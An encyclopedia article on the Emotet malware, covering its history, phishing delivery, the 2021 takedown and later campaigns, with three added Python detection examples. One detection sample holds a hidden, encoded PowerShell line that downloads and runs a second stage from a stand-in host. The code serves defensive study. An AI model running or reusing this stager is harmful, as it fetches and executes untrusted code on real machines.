Software:Emotet

From HandWiki

Emotet is a malware strain and a cybercrime operation believed to be based in Ukraine.[1] The malware, also known as Heodo, was first detected in 2014 and deemed one of the most prevalent threats of the decade.[2][3][4] In 2021, the servers used for Emotet were disrupted through global police action in Germany and Ukraine and brought under the control of law enforcement.[4] Despite this disruption, Emotet resurfaced in subsequent years with new capabilities, continuing to be regarded as one of the Internet’s most persistent and adaptable threats.[5][6]

First versions of the Emotet malware functioned as a banking trojan aimed at stealing banking credentials from infected hosts. Throughout 2016 and 2017, Emotet operators, sometimes known as Mealybug, updated the trojan and reconfigured it to work primarily as a "loader," a type of malware that gains access to a system, and then allows its operators to download additional payloads.[7] Second-stage payloads can be any type of executable code, from Emotet's own modules to malware developed by other cybercrime gangs.

Initial infection of target systems usually begins with a macro-enabled document attached to an email. The email is crafted to look like a legitimate reply to a message the victim had sent earlier, a technique known as email thread hijacking.[8]
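The thread-hijacked reply described above can be screened at the mail gateway: a message that quotes a thread the recipient really took part in, but arrives from an address that does not belong to the contact it names, and carries a macro-capable attachment, is the Emotet pattern. The following heuristic is an added example for this article, not code from any cited source; the contact directory, the set of our own sent Message-IDs, and the raw message are all constructed here for illustration.

```python
"""Heuristic for Emotet-style thread hijacking at a mail gateway.

Added example, not from the article or its sources. Flags a reply whose
display name matches a known contact while the sending address does not,
and which carries a macro-capable attachment. Directory, sent-ID set and
the sample message are constructed stand-ins.
"""
import email
from email import policy
from email.utils import parseaddr

MACRO_EXTENSIONS = (".doc", ".dot", ".docm", ".xls", ".xlsm", ".xlsb", ".pptm", ".zip")

# Constructed directory: display name -> the address that contact really uses.
KNOWN_CONTACTS = {"Dana Mueller": "dana.mueller@partner.example"}
# Constructed set of Message-IDs our own users sent (e.g. taken from MTA logs).
OUR_SENT_IDS = {"<20240102.1234@corp.example>"}


def attachment_names(msg):
    """File names of the non-body MIME parts (empty for single-part mail)."""
    return [p.get_filename() for p in msg.iter_attachments() if p.get_filename()]


def assess_reply(raw, contacts=KNOWN_CONTACTS, sent_ids=OUR_SENT_IDS):
    """Score one raw RFC 5322 message; returns flags plus a verdict."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    name, addr = parseaddr(str(msg.get("From", "")))
    _, reply_to = parseaddr(str(msg.get("Reply-To", "")))
    in_reply_to = str(msg.get("In-Reply-To", "")).strip()

    # The reply really references a thread our user started (hijacked thread).
    quotes_our_thread = in_reply_to in sent_ids
    # Known display name, but the envelope address is not that contact's.
    expected = contacts.get(name)
    impersonation = bool(expected) and addr.lower() != expected.lower()
    # A Reply-To pointing elsewhere is another sign the thread was hijacked.
    reply_to_mismatch = bool(reply_to) and reply_to.lower() != addr.lower()
    macro_files = [n for n in attachment_names(msg)
                   if n.lower().endswith(MACRO_EXTENSIONS)]

    # Verdict: a macro-capable attachment plus a sender anomaly. Quoting our
    # own thread alone is normal for a genuine partner, so it only adds weight.
    suspicious = bool(macro_files) and (impersonation or reply_to_mismatch)
    return {
        "from": addr,
        "quotes_our_thread": quotes_our_thread,
        "impersonation": impersonation,
        "reply_to_mismatch": reply_to_mismatch,
        "macro_attachments": macro_files,
        "suspicious": suspicious,
    }


# Constructed sample: a "reply" to a real invoice thread, same display name as
# the partner contact, but sent from an unrelated domain with a .doc attached.
SAMPLE_RAW = b"""From: "Dana Mueller" <dana.mueller@zq-hosting.example>
To: alice@corp.example
Subject: RE: Invoice 2024-01
In-Reply-To: <20240102.1234@corp.example>
References: <20240102.1234@corp.example>
Message-ID: <abc123@zq-hosting.example>
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Hi Alice, please see the attached document.

> On 2 Jan, alice@corp.example wrote:
> Hi Dana, attached is the invoice we discussed.

--b1
Content-Type: application/msword; name="invoice.doc"
Content-Disposition: attachment; filename="invoice.doc"
Content-Transfer-Encoding: base64

0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAA
--b1--
"""

if __name__ == "__main__":
    print(assess_reply(SAMPLE_RAW))
```

The verdict deliberately requires a sender anomaly in addition to the attachment: a genuine partner replying with a .doc to a thread you started is normal traffic, and the hijacked-thread signal alone only raises the weight of the other findings.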

It has been widely documented that the Emotet authors have used the malware to build a botnet of infected computers and sell access to it in an infrastructure as a service (IaaS) style model, referred to in the cybersecurity community as malware as a service (MaaS), cybercrime as a service (CaaS), or crimeware.[9] Emotet is known for renting access to infected computers to ransomware operations such as the Ryuk gang.[10]

History

In 2014, Emotet was first identified as a banking trojan designed to steal banking credentials from infected hosts. Within a year or two, the malware evolved into a more versatile and dangerous threat. It transformed into a loader, allowing operators to download additional malicious payloads onto infected systems, such as the TrickBot banking trojan and Ryuk ransomware.[5]

As of September 2019, the Emotet operation ran on top of three separate botnets called Epoch 1, Epoch 2, and Epoch 3.[11]

In mid-2020, Emotet re-emerged after a brief hiatus, launching widespread malspam campaigns targeting organizations globally. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) reported over 16,000 Emotet-related alerts across federal networks between July and October 2020.[5] Emotet leveraged advanced evasion techniques, including polymorphic code, fileless persistence via PowerShell, lateral movement via nearby Wi-Fi networks, and email thread hijacking to increase the success of phishing attacks.[5] Campaigns often used malicious Microsoft Word documents with file names such as "form.doc" or "invoice.doc", whose macros launched PowerShell scripts to fetch the initial payload.[12] Later in the year, Emotet operators also used parked domains to distribute malicious code.[13]
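The maldoc-to-PowerShell chain described above (Word opens "invoice.doc", its macro runs a hidden PowerShell downloader, usually via cmd.exe) leaves a process tree that endpoint telemetry can catch regardless of how the document itself is obfuscated. The detection below is an added example written for this article, not Emotet code and not from any cited source: it walks Sysmon-style process-creation records, flags PowerShell with an Office application anywhere in its ancestry, and decodes the -EncodedCommand argument so an analyst sees the script. The events and the encoded payload are constructed here.

```python
"""Flag Office -> (cmd) -> PowerShell process chains and decode -EncodedCommand.

Added example for this article (not Emotet code, not from the cited sources).
Input records mimic Sysmon Event ID 1 fields (pid, ppid, image, cmd) but are
constructed; the encoded payload is a harmless stand-in for a stager.
"""
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (and -ec).
_FLAGS = sorted({"encodedcommand"[:i] for i in range(1, 15)} | {"ec"},
                key=len, reverse=True)
_ENC_RE = re.compile(r"(?i)(?:^|\s)[-/](?:" + "|".join(_FLAGS)
                     + r")\s+([A-Za-z0-9+/=]+)")


def basename(path):
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """UTF-16LE script behind an -EncodedCommand argument, or None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def ancestry(events, pid, max_depth=4):
    """Image basenames of pid and its parents, nearest first (bounded walk)."""
    by_pid = {e["pid"]: e for e in events}
    chain = []
    while pid in by_pid and len(chain) < max_depth:
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def find_office_to_powershell(events, max_depth=4):
    """Alerts for PowerShell processes with an Office application above them."""
    alerts = []
    for e in events:
        if basename(e["image"]) not in POWERSHELL:
            continue
        chain = ancestry(events, e["pid"], max_depth)
        office = next((img for img in chain[1:] if img in OFFICE_APPS), None)
        if office is None:
            continue
        alerts.append({
            "pid": e["pid"],
            "chain": " -> ".join(reversed(chain)),
            "parent_office": office,
            "decoded": decode_encoded_command(e["cmd"]),
        })
    return alerts


# Constructed sample telemetry. The encoded command is built here so the
# example is self-contained; example.invalid never resolves.
_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
_ENCODED = base64.b64encode(_SCRIPT.encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.doc"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd /c powershell -w hidden -enc " + _ENCODED},
    {"pid": 400, "ppid": 300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -w hidden -enc " + _ENCODED},
    # Benign: PowerShell started from Explorer with a plain command line.
    {"pid": 500, "ppid": 100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell -ep Bypass -Command Get-Process"},
]

if __name__ == "__main__":
    for alert in find_office_to_powershell(SAMPLE_EVENTS):
        print(alert["chain"], "|", alert["decoded"])
```

Walking the ancestry rather than checking only the immediate parent matters because the macro usually goes through cmd.exe or wscript.exe first; the bounded depth keeps a long-lived Office process from tainting unrelated children hours later.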

In January 2021, international action coordinated by Europol and Eurojust allowed investigators to take control of and disrupt the Emotet infrastructure.[14] The reported action was accompanied by arrests made in Ukraine.[15]

On 14 November 2021, new Emotet samples emerged that were very similar to the previous bot code, but with a different encryption scheme that used elliptic curve cryptography for command and control communications.[16] The new Emotet infections were delivered by TrickBot to computers it had already infected, and the revived botnet soon began sending malicious spam email messages with macro-laden Microsoft Word and Excel files as payloads.[17]

On 3 November 2022, new samples of Emotet emerged, delivered as XLS files attached to email messages.[18][self-published source]

In March 2023, Emotet resurfaced after a four-month hiatus with a new spam campaign. Emails spoofed known contacts, addressed recipients by name, and mimicked prior threads. Attached Word documents were inflated to over 500 MB using binary padding and included hidden Moby-Dick excerpts to evade detection. If macros were enabled, the document downloaded a ZIP file from a compromised site and executed a large DLL. The malware harvested credentials, sent spam, and installed secondary payloads such as TrickBot or Ryuk. Targets included organizations in Europe, Asia-Pacific, and Latin America.[6]
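The binary padding above works because many scanners skip files over a size cap, so a 500 MB document is never inspected at all. The counter-measure is to measure how much of a large file is padding and scan the document with the padding removed. The code below is an added example for this article, not from the campaign or any cited source: it reports the trailing run of a repeated byte, the share of low-entropy blocks, and an "effective size", and strips the padding so the real document can be scanned. The size cap is an assumed value to tune to your scanner, and the sample documents are constructed in memory (2 MiB of padding stands in for the 500 MB seen in the wild).

```python
"""Spot Office documents inflated with padding to evade size-capped scanners.

Added example, not part of the article or any cited source. Measures how
much of a file is a repeated byte or low-entropy filler and reports the
size with the padding removed. Samples are constructed in memory.
"""
import math
import random
from collections import Counter

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy .doc/.xls container
ZIP_MAGIC = b"PK\x03\x04"                          # .docx/.xlsx container
CHUNK = 64 * 1024


def document_kind(data):
    """Container type from the leading magic bytes."""
    if data.startswith(OLE2_MAGIC):
        return "ole2"
    if data.startswith(ZIP_MAGIC):
        return "ooxml-zip"
    return "unknown"


def shannon_entropy(data):
    """Bits per byte of a byte string (0.0 for empty or single-valued data)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def trailing_pad(data):
    """(pad_byte, length) of the run of one byte value at the end of data."""
    if not data:
        return None, 0
    last = data[-1]
    return last, len(data) - len(data.rstrip(bytes([last])))


def low_entropy_fraction(data, threshold_bits=1.0):
    """Share of CHUNK-sized blocks whose entropy is below threshold_bits.

    Catches patterned filler (repeating strings) that a single-byte trailing
    run check would miss.
    """
    if not data:
        return 0.0
    blocks = range(0, len(data), CHUNK)
    flat = sum(1 for i in blocks if shannon_entropy(data[i:i + CHUNK]) < threshold_bits)
    return flat / len(blocks)


def analyze(data, size_cap=64 * 1024 * 1024, min_pad_fraction=0.5):
    """Verdict on whether a document looks artificially inflated.

    size_cap is an assumed stand-in for a scanner's 'too big to scan' limit;
    a file at or above it that is mostly padding is flagged, and its size
    with the padding removed is reported so it can still be scanned.
    """
    size = len(data)
    pad_byte, pad_len = trailing_pad(data)
    flat = low_entropy_fraction(data)
    pad_fraction = pad_len / size if size else 0.0
    inflated = size >= size_cap and max(pad_fraction, flat) >= min_pad_fraction
    return {
        "kind": document_kind(data),
        "size": size,
        "pad_byte": pad_byte,
        "trailing_pad": pad_len,
        "effective_size": size - pad_len,
        "low_entropy_fraction": round(flat, 3),
        "inflated": inflated,
    }


def strip_padding(data):
    """The document with its trailing padding run removed."""
    _, pad_len = trailing_pad(data)
    return data[:len(data) - pad_len] if pad_len else data


def make_sample(pad_len, pad_byte=0x00, seed=1):
    """Constructed stand-in for a padded legacy .doc: OLE2 magic, 32 KiB of
    pseudo-random 'content' that never uses pad_byte, then a run of pad_byte.
    Not a real document."""
    rng = random.Random(seed)
    others = [b for b in range(256) if b != pad_byte]
    body = OLE2_MAGIC + bytes(rng.choice(others) for _ in range(32 * 1024))
    return body + bytes([pad_byte]) * pad_len


if __name__ == "__main__":
    padded = make_sample(2 * 1024 * 1024)
    print(analyze(padded, size_cap=1024 * 1024))
    print("scannable bytes after stripping:", len(strip_padding(padded)))
```

Both measures are kept because they fail differently: the trailing-run check is exact and cheap for null padding, while the per-block entropy catches filler made of repeated text. Stripping only the trailing run is safe for OLE2 and ZIP containers whose real structure ends before the padding; for a ZIP, the central directory offsets still point inside the kept prefix.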

In late 2023, Microsoft and the U.S. National Institute of Standards and Technology (NIST) reported that attackers were abusing a Windows vulnerability, tracked as CVE-2021-43890, to distribute malware, including Emotet. The technique involved phishing emails whose malicious attachments leveraged the Windows App Installer feature. To reduce the risk of exploitation, Microsoft updated the software to disable the affected functionality by default.[19]

Noteworthy infections

  • Allentown, city in Pennsylvania, United States (2018)[20][21]
  • Heise Online, publishing house based in Hanover, Germany (2019)[8]
  • Kammergericht Berlin, the highest court of the state of Berlin, Germany (2019)[22][23]
  • Humboldt University of Berlin, university in Berlin, Germany (2019)[24]
  • Universität Gießen, university in Germany (2019)[25]
  • Department of Justice of the province of Quebec (2020)[26]
  • Lithuanian government (2020)[27]
  • Democratic National Committee, political organization in the United States (2020)[5]
  • Government entities in France, Japan, and New Zealand (2020)[5]

References

  1. Ikeda, Scott (August 28, 2020). "Emotet Malware Taken Down By Global Law Enforcement". Cpomagazine. https://www.cpomagazine.com/cyber-security/emotet-malware-taken-down-by-global-law-enforcement-effort-cleanup-patch-pushed-to-1-6-million-infected-devices/. Retrieved May 1, 2021. 
  2. "Emotet's Malpedia entry". 2020-01-03. https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet. 
  3. Ilascu, Ionut (2019-12-24). "Emotet Reigns in Sandbox's Top Malware Threats of 2019". https://www.bleepingcomputer.com/news/security/emotet-reigns-in-sandboxs-top-malware-threats-of-2019/. 
  4. 4.0 4.1 European Union Agency for Criminal Justice Cooperation (2021-01-27). "World's most dangerous malware EMOTET disrupted through global action". https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action. 
  5. 5.0 5.1 5.2 5.3 5.4 5.5 "DHS warns that Emotet malware is one of the most prevalent threats today". 7 October 2020. https://arstechnica.com/information-technology/2020/10/dhs-warns-that-emotet-malware-is-one-of-the-most-prevalent-threats-today/. 
  6. 6.0 6.1 "Botnet that knows your name and quotes your email is back with new tricks". 13 March 2023. https://arstechnica.com/information-technology/2023/03/botnet-that-knows-your-name-and-quotes-your-email-is-back-with-new-tricks/. 
  7. Christiaan Beek (December 6, 2017). "Emotet Downloader Trojan Returns in Force". https://www.mcafee.com/blogs/other-blogs/mcafee-labs/emotet-downloader-trojan-returns-in-force/. 
  8. 8.0 8.1 Schmidt, Jürgen (June 6, 2019). "Trojaner-Befall: Emotet bei Heise" (in de). Heise Online. https://www.heise.de/ct/artikel/Trojaner-Befall-Emotet-bei-Heise-4437807.html. Retrieved November 10, 2019. 
  9. Brandt, Andrew (2019-12-02). "Emotet's Central Position in the Malware Ecosystem". Sophos. https://news.sophos.com/en-us/2019/12/02/emotets-central-position-in-the-malware-ecosystem/. Retrieved 2019-09-19. 
  10. "North Korean APT(?) and recent Ryuk Ransomware attacks". January 10, 2019. https://www.kryptoslogic.com/blog/2019/01/north-korean-apt-and-recent-ryuk-ransomware-attacks/. 
  11. Cimpanu, Catalin (2019-09-16). "Emotet, today's most dangerous botnet, comes back to life". ZDnet. https://www.zdnet.com/article/emotet-todays-most-dangerous-botnet-comes-back-to-life/. 
  12. "July 2020's Most Wanted Malware: Emotet Strikes Again After Five-Month Absence" (Press release). August 7, 2020.
  13. "Emotet uses parked domains to distribute payloads" (in en-US). 2020-10-30. https://howtofix.guide/emotet-uses-parked-domains-to-distribute-payloads/. 
  14. "World's most dangerous malware EMOTET disrupted through global action" (in en). https://www.europol.europa.eu/newsroom/news/world%E2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action. 
  15. Cimpanu, Catalin (January 27, 2021). "Authorities plan to mass-uninstall Emotet from infected hosts on March 25, 2021". ZDNet. 
  16. "Emotet botnet returns after law enforcement mass-uninstall operation". The Record. November 15, 2021. https://therecord.media/emotet-botnet-returns-after-law-enforcement-mass-uninstall-operation/. 
  17. "Emotet Returns". SANS Internet Storm Center. https://isc.sans.edu/forums/diary/Emotet+Returns/28044/. 
  18. "Cryptolaemus (@Cryptolaemus1)" (in en). https://twitter.com/Cryptolaemus1/status/1587792659275448320. 
  19. "Vulnerability Change Records for CVE-2021-43890". 29 May 2024. https://nvd.nist.gov/vuln/detail/CVE-2021-43890/change-record?changeRecordedOn=05/29/2024T11:15:50.500-0400. 
  20. "Malware infection poised to cost $1 million to Allentown, Pa.". The Washington Times. https://www.washingtontimes.com/news/2018/feb/21/malware-infection-posed-cost-1-million-allentown-p/. 
  21. "Emotet malware gang is mass-harvesting millions of email in mysterious campaign". https://www.zdnet.com/article/emotet-malware-gang-is-mass-harvesting-millions-of-emails-in-mysterious-campaign/. 
  22. "Emotet: Trojaner-Angriff auf Berliner Kammergericht" (in de). Der Spiegel. October 4, 2019. https://www.spiegel.de/netzwelt/web/emotet-berliner-kammergericht-wird-opfer-einer-trojaner-attacke-a-1289919.html. 
  23. "Emotet: Wie ein Trojaner das höchste Gericht Berlins lahmlegte" (in de). Frankfurter Allgemeine Zeitung. https://www.faz.net/aktuell/wirtschaft/diginomics/emotet-wie-ein-trojaner-das-hoechste-gericht-berlins-lahmlegte-16442702.html. 
  24. "Trojaner greift Netzwerk von Humboldt-Universität an" (in de). dpa. Heise Online. November 9, 2019. https://www.heise.de/newsticker/meldung/Trojaner-greift-Netzwerk-von-Humboldt-Universitaet-an-4583300.html. Retrieved November 10, 2019. 
  25. "Trojaner-Befall: Uni Gießen nutzt Desinfec't für Aufräumarbeiten" (in de). Heise Online. December 19, 2019. https://www.heise.de/security/meldung/Trojaner-Befall-Uni-Giessen-nutzt-Desinfec-t-fuer-Aufraeumarbeiten-4617154.html?wt_mc=rss.red.ho.beitrag.atom.beitrag.beitrag. Retrieved December 22, 2019. 
  26. Joncas, Hugo (September 12, 2020). "Les pirates informatiques ont pu voler tous les courriels". https://www.journaldemontreal.com/2020/09/12/les-pirates-informatiques-ont-pu-voler-tous-les-courriels. 
  27. "Several institutions affected by email virus in Lithuania – center". https://www.baltictimes.com/several_institutions_affected_by_email_virus_in_lithuania___center/. 